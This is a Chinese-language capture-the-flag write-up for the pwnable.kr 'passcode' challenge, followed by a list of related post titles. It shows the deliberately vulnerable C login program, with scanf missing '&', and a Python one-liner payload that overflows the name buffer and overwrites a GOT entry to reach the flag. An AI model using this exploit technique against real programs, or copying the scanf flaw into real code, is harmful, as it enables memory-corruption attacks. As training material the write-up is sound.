writeup-passcode
Mommy told me to make a passcode based login system.
My initial C code was compiled without any error!
Well, there was some compiler warning, but who cares about that?
ssh passcode@pwnable.kr -p2222 (pw:guest)
题目如上
拿到题目,先分析下源码
代码如下
#include <stdio.h>
#include <stdlib.h>void login(){int passcode1;int passcode2;printf("enter passcode1 : ");scanf("%d", passcode1);fflush(stdin);// ha! mommy told me that 32bit is vulnerable to bruteforcing :)printf("enter passcode2 : ");scanf("%d", passcode2);printf("checking...\n");if(passcode1==338150 && passcode2==13371337){printf("Login OK!\n");system("/bin/cat flag");}else{printf("Login Failed!\n");exit(0);}
}void welcome(){char name[100];printf("enter you name : ");scanf("%100s", name);printf("Welcome %s!\n", name);
}int main(){printf("Toddler's Secure Login System 1.0 beta.\n");welcome();login();// something after login...printf("Now I can safely trust you that you have credential :)\n");return 0;
}
看了下源码,貌似是要passcode1和passcode2等于338150 和 13371337
编译了一下,发现scanf那里没有加&,那写入的地址应该是随机的,完全没有头绪,先扔IDA和gdb一下
gdb调试了一下,发现读入的name最后四个字节就是passcode1的默认值(这里记得要上服务器把文件拖下来,自己编译的并没有这个漏洞)
有了这个漏洞还是不行,查了下别人wp,又补充了下基础知识。。。
got表覆写:http://blog.csdn.net/smalosnail/article/details/53247502
补充完知识之后就愉快的构造payload吧
python -c “print ‘A’ * 96 + ‘\x04’+’\xa0’+’\x04’+’\x08’ + str(0x80485e3)” |./passcode
然后拿到flag
Sorry mom.. I got confused about scanf usage :(
writeup-passcode相关推荐
- PWN passcode [pwnable.kr]CTF writeup题解系列5
直接看题目: 连接服务器看看情况: root@mypwn:/ctf/work/pwnable.kr# ssh passcode@pwnable.kr -p2222 passcode@pwnable.k ...
- hackme.inndy.tw的一些Writeup(5月30更新)
hackme.inndy.tw的一些Writeup(6月3日更新) 原文链接:http://www.cnblogs.com/WangAoBo/p/7706719.html 推荐一下https://ha ...
- 2021年中国工业互联网安全大赛核能行业赛道writeup之usb流量分析
目录 一.USB协议 二.键盘流量 三.鼠标流量 四.writeup 附件题:usb流量分析 题目描述: 具体描述忘记了o(╯□╰)o 大概意思是有个U盘插到电脑上,然后经过一些操作导致该电脑重启了. ...
- 2021年中国工业互联网安全大赛核能行业赛道writeup之鱿鱼游戏
目录 一.尝试 二.Writeup 附加题 鱿鱼游戏(来自最近一部很火的韩剧) 题目描述: 小王由于操作不规范,误将不明U盘插入到上位机中,导致上位机中的某些关键文件被加密,但攻击者在U盘中还留下了一 ...
- 2018湖湘杯海选复赛Writeup
2018湖湘杯Writeup 0x01 签到题 0x02 MISC Flow 0x03 WEB Code Check 0x04 WEB Readflag 0x05 WEB XmeO 0x06 Reve ...
- php upload ctf,强网杯CTF防御赛ez_upload Writeup
这是强网杯拟态防御线下赛遇到的web题目,本来是不打算分享Writeup的,但是由于问的人很多,于是这里分享给大家. ez_upload这题算是非常经典的堆叠black trick的题目,算是比较典型 ...
- 安恒赛php_安恒11月月赛周周练writeup
前言 11月月赛 完美错过时间,正好有周周练,基本都是一样月赛的web,记录下write up 手速要快 这题是10月月赛中的一题,直接看我上次的writeup:安恒月赛(十)web-2题writeu ...
- 南京邮电大学网络攻防训练平台(NCTF)-异性相吸-Writeup
南京邮电大学网络攻防训练平台(NCTF)-异性相吸-Writeup 题目描述 文件下载地址 很明显,文件之间进行亦或就可得到flag,不再多说,直接上脚本 1 #coding:utf-8 2 file ...
- 社团的CTF逆向题WriteUp
最近社团弄了CTF比赛,然后我就帮忙写了逆向的题目,这里写一下WriteUp,题目和源码在附件中给出 一个简单的逆向:one_jmp_to_flag.exe 这题算是签到题,直接OD智能搜索就完事了, ...
- CTF-i春秋网鼎杯第一场misc部分writeup
CTF-i春秋网鼎杯第一场misc部分writeup 最近因为工作原因报名了网鼎杯,被虐了几天后方知自己还是太年轻!分享一下自己的解题经验吧 minified 题目: 一张花屏,png的图片,老方法, ...
最新文章
- 说说在MVC开发中,遇到的错误及解决方法(本文章是我在实际开发中总结出来的,希望对您有帮助)...
- cephfs 挂载 卸载
- Python之web开发(六):python使用django框架搭建网站之登陆页搭建不同页面之间跳转
- 内省java_Java内省 – 奇怪的行为
- Visual 数据绑定
- 了解计算机PS,2017年计算机等考一级PS辅导:了解Photoshop7.0中十大快捷操作
- C语言之避免编译警告:unused用法(七)
- xpath抓取html不完全,scrapy的xpath是否取HTML标签的情况分析
- Java程序员实现完美代码的十大要素
- hdu 4155 回溯
- C# TeeChart使用心得,干货
- (转载)100+个程序员开发必备参考手册(在线及下载)
- # RPGMaker MV 基础 1 : 项目目录认识
- gamit数据处理—5.遇到的问题
- monkey的基本操作命令
- Chrome将已有的插件,打包成crx供其他电脑使用
- 优化MySchool数据库设计(SQL Server)
- latex表格内容上下居中_LaTex表格内单元格内容换行
- F矩阵的自由度是多少?
- 群晖 NAS + frp 最新端口